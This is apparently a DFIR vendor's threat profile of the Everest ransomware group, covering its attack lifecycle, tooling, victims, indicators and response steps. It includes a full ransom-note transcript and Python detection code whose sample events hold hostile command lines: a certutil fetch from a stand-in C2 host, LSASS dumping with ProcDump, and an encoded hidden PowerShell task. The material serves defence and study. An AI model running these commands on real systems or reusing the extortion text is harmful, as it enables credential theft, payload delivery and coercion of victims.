Everest Ransomware: Threat Profile, Attack Lifecycle, and Response Guide

Everest is a financially motivated ransomware and cyber extortion group active since at least December 2020. Over five years of activity, Everest has combined ransomware deployment, data-leak extortion, initial-access brokerage, and direct insider recruitment into a single, adaptable criminal operation that has proven resilient to infrastructure disruptions and law enforcement pressure.
The group has compromised or claimed attacks against organizations across healthcare, aerospace, government, aviation, and critical infrastructure, with victims spanning North America, Latin America, and Europe.
Origins and evolution of the Everest ransomware
Few ransomware groups have reinvented their operational model as deliberately as Everest. Over five years, the group moved from a data-theft-only operation to full double extortion, then pivoted toward access brokerage and insider recruitment as conditions in the criminal ecosystem shifted.
Understanding that progression matters for defenders: the tactics Everest uses today are a product of calculated adaptation, not a fixed playbook.
How did Everest start: Exfiltration-only origins
Everest emerged in December 2020 as a data theft and extortion operation. Early campaigns focused on network compromise, data exfiltration, and leak-site publication without deploying file-encrypting malware.
Initial targeting was concentrated in Canada, Latin America, and the public sector. Researchers noted early operational similarities to the EverBe 2.0 ransomware lineage, which informed later encryption design choices.
Everest ransomware evolves into double extortion
By 2021, Everest incorporated encryption into its operations, adopting the double extortion model that had become standard across the ransomware ecosystem.
Encryption routines used AES and DES algorithms, with a notable architectural decision: encryption keys were generated locally on victim hosts rather than delivered from a remote command-and-control server. This reduced dependency on centralized infrastructure and complicated decryption-key-based recovery approaches that assume server-side key custody.
The standard attack sequence became: initial compromise → reconnaissance → data exfiltration → encryption → public extortion via leak site.
2021–2023: Shift to initial access brokerage
Beginning around November 2021, HC3 reporting from the U.S. Department of Health and Human Services identified Everest operating as an initial access broker (IAB), selling compromised network footholds to other cybercriminal actors rather than always deploying ransomware directly.
By mid-2023, researchers documented a significant rise in IAB activity, with the group advertising RDP and VPN credentials on criminal forums and actively partnering with other ransomware-as-a-service operators.
This repositioned Everest simultaneously as a direct threat actor and a supplier to other criminal ecosystems, a materially different risk profile than a conventional ransomware group, and one that makes disrupting any single operation less effective.
Current strategy: Insider recruitment and data-only extortion
In October 2023, Everest began openly recruiting corporate insiders through cybercrime forums, advertising for employees willing to provide VPN access, as well as IT administrators and contractors holding privileged credentials. Compensation offers included cash payments and revenue-sharing arrangements drawn from extortion proceeds.
When an attacker can recruit a legitimate employee, multi-factor authentication becomes less effective, and detection shifts from perimeter monitoring toward behavioral analysis of accounts that have every right to be where they are.
Recent reports indicate the group increasingly favors data-only extortion, bypassing encryption entirely in favor of faster, lower-footprint monetization. This trend likely reflects growing law enforcement pressure on traditional ransomware models and a preference for reduced forensic exposure.
In 2025, Everest's dark web leak site was defaced with the message "Don't do crime CRIME IS BAD xoxo from Prague." Security researchers speculated the defacement may have involved rival operators. Despite the disruption, the group continued operations, a pattern consistent across previous infrastructure setbacks.
Everest ransomware attack lifecycle
Not every Everest incident follows the same pattern. Some operations focus exclusively on data theft and extortion without deploying encryption. The following phases reflect the group's full-capability attack chain.
Phase 1: Initial access
Everest's primary entry point is through exposed remote services, including Remote Desktop Protocol (RDP) and VPN endpoints.
Additional access vectors include:
- Stolen credentials
- Purchased access from other brokers
- Phishing
- Exploitation of unpatched systems
- Insider-provided access
Phase 2: Reconnaissance
Once inside, operators enumerate the environment: Active Directory discovery, network mapping, file share identification, backup location, and administrative privilege assessment.
Observed tooling includes SoftPerfect Network Scanner alongside built-in Windows utilities and PowerShell.
Backup identification is a deliberate early-phase priority; locating and later disrupting recovery options before the victim detects the intrusion is central to the group's pressure strategy.
Phase 3: Credential access
Credential harvesting typically involves using ProcDump to dump LSASS memory and extract credentials from the Windows process that manages authentication.
Harvested credentials enable subsequent lateral movement without triggering new authentication events, and support privilege escalation toward domain-level access.
Phase 4: Lateral movement
Everest relies heavily on legitimate administrative tools to blend with normal enterprise activity, a technique commonly referred to as living off the land. Observed tools include AnyDesk, Splashtop, Atera, RDP, SMB, and PowerShell remoting. These tools share behavioral signatures with legitimate IT operations, which is precisely why they are selected.
According to Proven Data’s expert Amr Fathy, WMI and PowerShell are the most common lateral movement tools. The commands look identical to those used in sysadmin activity. “We differentiate by context: which account, which time, which source, which child processes. WMI spawning certutil, for example,” he explains.
This behavioral differentiation, not signature detection, is the operative detection approach when legitimate tools constitute the primary threat.
Phase 5: Data exfiltration
Data exfiltration precedes encryption in Everest operations, and in data-only attacks, it is the entire operation.
Targeted data includes PII, PHI, financial records, legal documents, internal communications, intellectual property, and customer databases.
Staging relies on WinRAR and archive compression utilities, with exfiltration conducted over encrypted outbound channels that blend with normal web traffic.
Phase 6: Impact
When encryption is deployed, the ransomware appends .EVEREST to encrypted files and drops EVEREST LOCKER.txt as the ransom note.
Healthcare victims have reportedly received compressed extortion timelines designed to amplify operational pressure on environments with low downtime tolerance.
Across all incident types, victims face leak-site publication, countdown timers, and incremental sample data releases as escalating pressure mechanisms.
Tooling and defense evasion
The following toolset reflects Everest's documented approach:
- Cobalt Strike: a command-and-control framework for persistent remote access
- ProcDump: credential harvesting via LSASS memory dumping
- SoftPerfect Network Scanner: network enumeration
- WinRAR: data staging and archive compression
- AnyDesk, Splashtop, Atera: remote access and lateral movement
- PowerShell, WMI: scripting, execution, and remote administration
A defining behavioral pattern is the systematic post-execution deletion of tools, removing forensic artifacts after each operational phase to impede the reconstruction of the attack chain. This is paired with log tampering and temporary payload staging that leave minimal indicators once the operator has moved on.
Code analysis of Everest's encryption implementation links it to the BlackByte ransomware family and the EverBe 2.0 lineage. The local key generation design described earlier is one artifact of that lineage. Code overlap does not necessarily indicate a direct organizational relationship, but it does suggest shared development resources or code sourcing from overlapping criminal communities.
A broader evasion technique increasingly observed in ransomware operations is BYOVD (Bring Your Own Vulnerable Driver). "Attackers load a signed but vulnerable driver into kernel mode. Once there, they exploit it to terminate EDR processes and remove kernel callbacks. Some ransomware families now embed the vulnerable driver directly in the payload; the driver loads, EDR goes blind, encryption begins within seconds," explains Fathy.
Everest ransomware targets
Everest has targeted organizations across healthcare, government, manufacturing, financial services, aerospace, transportation, critical infrastructure, telecommunications, energy, legal services, and education.
| Sector Targeting | Profile |
|---|---|
| Healthcare | Increasing since 2021; PHI, surgical facilities, operational urgency |
| Government | Federal agencies, public sector entities in the Americas |
| Aerospace & Defense | Supply chain exposure, industrial data |
| Aviation | Passenger data, airport systems, third-party suppliers |
| Financial Services | Insurance, banking sector |
| Telecommunications | Network infrastructure operators |
| Energy | Power grid infrastructure (2025 claims, partially unverified) |
| Manufacturing | Capital goods, industrial organizations |
The HC3 unit within the U.S. Department of Health and Human Services issued a formal threat profile on Everest, identifying the group as a credible and growing risk to healthcare organizations. Specific risks include PHI exposure, disruption to surgical facilities, impacts on patient care, and HIPAA-related regulatory exposure.
The Ascension cyberattack established a clear precedent for how ransomware incidents translate into operational disruption at a healthcare scale. Healthcare remains a structurally attractive target due to its operational urgency, the value of PHI on criminal markets, limited tolerance for system downtime, and historically weaker network segmentation compared to the financial services or defense sectors.
For healthcare organizations evaluating their exposure, Proven Data's healthcare cybersecurity guide covers the specific controls and preparedness steps most relevant to this threat class.
Confirmed and claimed incidents
The following incidents have been attributed to or claimed by Everest. Where claims remain publicly unverified, consistent with the broader pattern of ransomware leak-site postings, that status is noted.
Government and Public Sector
- NASA: listed among notable historical victims in HC3 reporting
- Brazilian government: government sector entities confirmed as Everest targets
Aviation and Transportation
- Dublin Airport: The group is linked to a breach involving millions of passenger records connected to Dublin Airport systems, highlighting third-party supplier risk in the aviation sector
Aerospace and Defense
- Collins Aerospace: Everest claimed responsibility for a breach involving sensitive aerospace-sector data, with potential supply chain and industrial operations exposure
Financial Services
- Liberty Mutual: Everest allegedly began leaking purported Liberty Mutual data on its leak site in 2025
Retail and Consumer
- Under Armour: Everest claimed theft of 343 GB of data, including employee and customer PII, internal documents, and order histories
- Clarins: Everest allegedly leaked data affecting over 600,000 customers, including names, birth dates, addresses, and purchase histories
- Mailchimp: Everest claimed theft of CRM and customer-related data; the significance of the leak was publicly questioned by cybersecurity observers
Critical Infrastructure
Everest has claimed incidents affecting European airport systems, Swedish power infrastructure, and telecommunications networks. Some of these claims have not been independently confirmed.
MITRE ATT&CK
| ATT&CK Tactic | Technique | ID |
|---|---|---|
| Initial Access | External Remote Services | T1133 |
| Initial Access | Valid Accounts | T1078 |
| Initial Access | Exploit Public-Facing Applications | T1190 |
| Execution | Command and Scripting Interpreter | T1059 |
| Privilege Escalation | Exploitation for Privilege Escalation | T1068 |
| Credential Access | OS Credential Dumping | T1003 |
| Discovery | Remote System Discovery | T1018 |
| Discovery | System Information Discovery | T1082 |
| Lateral Movement | Remote Services | T1021 |
| Collection | Archive Collected Data | T1560 |
| Exfiltration | Exfiltration Over C2 Channel | T1041 |
| Impact | Data Encrypted for Impact | T1486 |
| Defense Evasion | Indicator Removal on Host | T1070 |
Indicators of compromise
The following indicators are associated with Everest ransomware deployments, provided for detection and hunting purposes.
File system indicators
- Encrypted files appended with .EVEREST or .everest
- Ransom note file: EVEREST LOCKER.txt
Ransom note content transcript
Dear ,
Greetings from the Everest team. Your systems have been attacked, the files are encrypted. You can read about us in our blog (Tor browser needed)
Blog : ransomocmou6mnbquqz44ewosbkjk3o5qjsl3orawojexfook2j7esad[.]onion
Or read about our group in Twitter
Also, our team was able to bypass your "Dataprotection" as any other your protection software and more than 1 Terabyte of internal files were exfiltrated to our servers, which we can confirm with great joy and ease
The list contains financial documents, internal orders, KYC information(documents,photos...), trusted representatives personal info
Client risk levels,loans, debt and client data. Various financial documentation, backups , etc. etc.
The information was collected both from personal PCs and from centralized storage locations.
If an agreement is reached with us, this information will never be published and the problem will disappear as if it never happened, otherwise it will be posted on our blog and darknet. Which will lead to even greater financial and reputational losses on your part.
Also you will get
1.Attack logbook (months of experience with your company) with full list of vulnerabilities and bypass methods
2.Advices how to singifically improve your security and avoid such attacks in the future
3.We will delete all files from your company
4.We will attack your company no more
Yours trully Everest Team
Email to contact: [email protected]
Your key:
Tool-based indicators
- Unexpected ProcDump execution or direct LSASS process access
- SoftPerfect Network Scanner launched from non-standard or non-IT accounts
- WinRAR activity in temporary, staging, or user-profile directories outside of IT workflows
- AnyDesk, Splashtop, or Atera sessions initiated from unrecognized accounts or outside business hours
- Cobalt Strike indicators: unusual named pipes, injected processes, irregular outbound beaconing patterns
Behavioral indicators
- PowerShell or WMI commands executing from accounts, times, or source hosts that do not match established baselines
- Encoded PowerShell combined with outbound network activity
- Large outbound data transfers to unfamiliar external endpoints
- Scheduled task creation or modification following initial access
- GPO changes or logon script modifications, particularly during recovery windows
- Administrative tool installation or execution followed by immediate file deletion
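The contextual rules from Phase 4 (which account, which time, which source, which child processes) and the tool-based and behavioral indicator lists above, worked through as an added example that is not code from the original article or from Proven Data: a small triage routine over constructed Sysmon-style process-creation records. The IT account list, the business-hours window, and the sample events are assumptions made for the demonstration.

```python
from datetime import datetime

# Assumed environment facts (constructed): known IT accounts and normal working hours.
IT_ACCOUNTS = {"CORP\\svc_sccm", "CORP\\it.admin"}
BUSINESS_HOURS = range(7, 20)          # 07:00-19:59 UTC
REMOTE_TOOLS = {"anydesk.exe", "splashtop.exe", "ateraagent.exe"}
DOWNLOADERS = {"certutil.exe", "bitsadmin.exe", "powershell.exe"}

def _base(path):
    return path.rsplit("\\", 1)[-1].lower()

def triage_event(ev):
    """Return (rule, detail) findings for one process-creation event."""
    image, parent = _base(ev["image"]), _base(ev["parent_image"])
    cmd, user = ev["command_line"].lower(), ev["user"]
    cwd = ev["current_directory"].lower()
    hour = datetime.fromisoformat(ev["utc_time"]).hour
    findings = []
    # WMI provider host spawning a download/scripting tool (Fathy's example).
    if parent == "wmiprvse.exe" and image in DOWNLOADERS:
        findings.append(("wmi_spawn", f"WmiPrvSE -> {image}"))
    # ProcDump pointed at LSASS is credential dumping, never routine admin work.
    if image == "procdump.exe" and "lsass" in cmd:
        findings.append(("lsass_dump", cmd))
    # Archive tool run by a non-IT account from temp or user-profile paths.
    if image in {"winrar.exe", "rar.exe"} and user not in IT_ACCOUNTS \
            and ("\\temp\\" in cwd or "\\users\\" in cwd):
        findings.append(("archive_staging", ev["current_directory"]))
    # Remote-access tool from an unrecognised account or outside business hours.
    if image in REMOTE_TOOLS and (user not in IT_ACCOUNTS or hour not in BUSINESS_HOURS):
        findings.append(("remote_tool_context", f"{user} at {hour:02d}:00 UTC"))
    # Encoded PowerShell command line.
    if image == "powershell.exe" and ("-enc " in cmd or "-encodedcommand" in cmd):
        findings.append(("encoded_powershell", cmd))
    return findings

def triage(events):
    return {ev["id"]: f for ev in events if (f := triage_event(ev))}

# Constructed Sysmon Event ID 1 style records; event 1 is benign IT activity.
SAMPLE_EVENTS = [
    {"id": 1, "utc_time": "2025-03-04T10:15:00", "user": "CORP\\it.admin",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "parent_image": "C:\\Windows\\explorer.exe", "current_directory": "C:\\Scripts\\",
     "command_line": "powershell.exe -File C:\\Scripts\\patch.ps1"},
    {"id": 2, "utc_time": "2025-03-04T02:40:00", "user": "CORP\\jsmith",
     "image": "C:\\Windows\\System32\\certutil.exe",
     "parent_image": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
     "current_directory": "C:\\Windows\\Temp\\", "command_line": "certutil.exe -urlcache -f hxxp://c2.example x"},
    {"id": 3, "utc_time": "2025-03-04T02:52:00", "user": "CORP\\jsmith",
     "image": "C:\\Windows\\Temp\\procdump.exe", "parent_image": "C:\\Windows\\System32\\cmd.exe",
     "current_directory": "C:\\Windows\\Temp\\", "command_line": "procdump.exe -ma lsass.exe out.dmp"},
    {"id": 4, "utc_time": "2025-03-04T23:10:00", "user": "CORP\\jsmith",
     "image": "C:\\Program Files\\AnyDesk\\AnyDesk.exe", "parent_image": "C:\\Windows\\explorer.exe",
     "current_directory": "C:\\Users\\jsmith\\", "command_line": "AnyDesk.exe"},
    {"id": 5, "utc_time": "2025-03-04T03:05:00", "user": "CORP\\jsmith",
     "image": "C:\\Program Files\\WinRAR\\WinRAR.exe", "parent_image": "C:\\Windows\\System32\\cmd.exe",
     "current_directory": "C:\\Users\\jsmith\\AppData\\Local\\Temp\\", "command_line": "WinRAR.exe a -r staged.rar D:\\Finance"},
]
```

Each rule keys on context rather than the tool name alone, which is why the first event, the same binary used by an IT account in its normal place and hour, produces no finding.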
Responding to an Everest ransomware attack
Understanding how to respond to an Everest incident is as operationally important as understanding how the group operates. Proven Data's guide on how to handle a ransomware attack covers the broader response framework. The following priorities are specific to Everest's tradecraft.
Immediate containment
- Isolate affected hosts from the network without premature shutdown; early shutdown destroys volatile evidence that cannot be recovered.
- Disable or restrict VPN sessions and RDP access at the perimeter.
- Invalidate active tokens and sessions for any account believed to be compromised.
Evidence preservation
- Capture memory from affected systems before any remediation action.
- Collect authentication logs, VPN session records, and remote administration tool activity.
- Preserve Active Directory state, GPO configurations, and scheduled task records.
The quality of the forensic record determines how much of the incident can ultimately be reconstructed.
Persistence hunting
Everest operators embed persistence in locations that survive standard recovery workflows.
Fathy notes that attackers embed persistence where teams don't check during recovery: a weekly task that re-downloads a beacon, or a modified GPO that pushes malicious logon scripts. “We've seen clients recover successfully and get re-compromised within 48 hours from a poisoned GPO in their restored Active Directory backup."
Before any environment is declared clean, audit scheduled tasks, logon scripts, GPO configurations, AdminSDHolder ACL modifications, application registrations in Entra ID, and service configurations.
Do not restore Active Directory backups without validating them against pre-incident snapshots.
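One way to implement the persistence audit described above, as an added example that is not the article's or Proven Data's own tooling: it parses Task Scheduler XML exports and diffs scheduled tasks and SYSVOL logon scripts against a pre-incident snapshot, flagging new or altered tasks, tasks whose action fetches or decodes remote content at run time (the weekly beacon re-download Fathy describes), and changed logon scripts (the poisoned GPO case). The snapshot contents, task names and paths are constructed; AdminSDHolder ACLs, Entra ID app registrations and services are not covered here.

```python
import hashlib
import xml.etree.ElementTree as ET

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# Command-line fragments that mean a task fetches or decodes remote content when it runs.
FETCH_MARKERS = ("-urlcache", "downloadstring", "invoke-webrequest", "/transfer", "-enc")

def parse_task(xml_text):
    """Pull author, executed action and weekly-trigger flag out of Task Scheduler XML."""
    root = ET.fromstring(xml_text)
    def text(path):
        return root.findtext(path, default="", namespaces=TASK_NS)
    return {
        "author": text("t:RegistrationInfo/t:Author"),
        "action": f'{text("t:Actions/t:Exec/t:Command")} {text("t:Actions/t:Exec/t:Arguments")}'.strip(),
        "weekly": root.find("t:Triggers/t:CalendarTrigger/t:ScheduleByWeek", TASK_NS) is not None,
    }

def hunt(baseline_tasks, current_tasks, baseline_scripts, current_scripts):
    """Diff restored/current state against the pre-incident snapshot; return (rule, object, detail)."""
    findings = []
    base = {n: parse_task(x) for n, x in baseline_tasks.items()}
    for name, xml_text in current_tasks.items():
        task = parse_task(xml_text)
        label = task["action"] + (" [weekly]" if task["weekly"] else "")
        if name not in base:
            findings.append(("new_task", name, label))
        elif task["action"] != base[name]["action"]:
            findings.append(("task_action_changed", name, label))
        if any(m in task["action"].lower() for m in FETCH_MARKERS):
            findings.append(("task_fetches_remote_content", name, label))
    for path, content in current_scripts.items():
        digest = hashlib.sha256(content).hexdigest()[:12]
        if path not in baseline_scripts:
            findings.append(("new_logon_script", path, digest))
        elif hashlib.sha256(baseline_scripts[path]).hexdigest()[:12] != digest:
            findings.append(("logon_script_changed", path, digest))
    return findings

def _task_xml(author, command, arguments):
    """Build a minimal Task Scheduler XML document with a weekly trigger (constructed)."""
    return f"""<Task version="1.2" xmlns="{TASK_NS['t']}">
  <RegistrationInfo><Author>{author}</Author></RegistrationInfo>
  <Triggers><CalendarTrigger><StartBoundary>2025-01-06T03:00:00</StartBoundary>
    <ScheduleByWeek><WeeksInterval>1</WeeksInterval></ScheduleByWeek></CalendarTrigger></Triggers>
  <Actions Context="Author"><Exec><Command>{command}</Command>
    <Arguments>{arguments}</Arguments></Exec></Actions>
</Task>"""

# Constructed snapshots: one legitimate task survives; a beacon-style task and a
# modified SYSVOL logon script were introduced during the intrusion.
SCRIPT = "\\\\corp.example\\SYSVOL\\corp.example\\scripts\\logon.bat"
BASELINE_TASKS = {"\\Corp\\Cleanup": _task_xml("CORP\\it.admin", "powershell.exe", "-File C:\\Scripts\\cleanup.ps1")}
CURRENT_TASKS = {**BASELINE_TASKS,
    "\\Microsoft\\Windows\\Telemetry\\Sync": _task_xml("CORP\\jsmith", "powershell.exe", "-NoP -W Hidden -Enc [base64 omitted]")}
BASELINE_SCRIPTS = {SCRIPT: b"net use H: \\\\fs01\\home\r\n"}
CURRENT_SCRIPTS = {SCRIPT: b"net use H: \\\\fs01\\home\r\nstart /b C:\\ProgramData\\svc.exe\r\n"}
```

Live task definitions can be exported with `schtasks /query /xml` or `Export-ScheduledTask` and fed in as the current snapshot, with the pre-incident export as the baseline.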
Credential rotation
Rotate credentials globally, not only for accounts that show direct compromise indicators.
In Everest incidents, credential exposure is typically broader than initial forensics suggest, because harvested credentials are used across multiple systems before any visible alert triggers.
Recovery sequencing
- Validate backup integrity before beginning restoration.
- Rebuild high-risk systems from verified clean images where possible rather than restoring from potentially compromised backups.
- Re-enable systems incrementally and maintain active monitoring throughout the recovery window.
Post-incident actions
- Conduct dark web monitoring for exfiltrated data appearing on Everest's leak site or traded on criminal forums.
- Assess HIPAA or other regulatory disclosure obligations where PHI may have been exposed.
- Review third-party and vendor access to identify whether the initial compromise entered through a supplier relationship rather than the primary environment.
Organizations requiring structured DFIR support or pre-incident preparedness can engage Proven Data's Incident Response Retainer for pre-negotiated access to response capabilities.
Strategic assessment
Everest represents the maturation of ransomware into a diversified cybercriminal enterprise. The group has cycled through four distinct operational models in five years: pure data extortion, double extortion with encryption, initial access brokerage, and insider-enabled data-only operations, with each transition improving operational resilience and revenue diversification.
For security teams, incident responders, and MSPs, the practical implication is that Everest incidents cannot be addressed solely by perimeter controls. Detecting this group requires behavioral analysis, identity monitoring, and post-compromise forensic capabilities in environments where the attacker may have operated undetected for weeks before triggering a visible alert.

Written by
Amr Fathy is a dedicated cybersecurity professional with over 7 years of extensive experience in digital forensics, incident response, reverse engineering, and threat intelligence. He currently serves as Senior DFIR Engineer at Proven Data LLC, conducting triage collection, incident response, and digital forensics activities.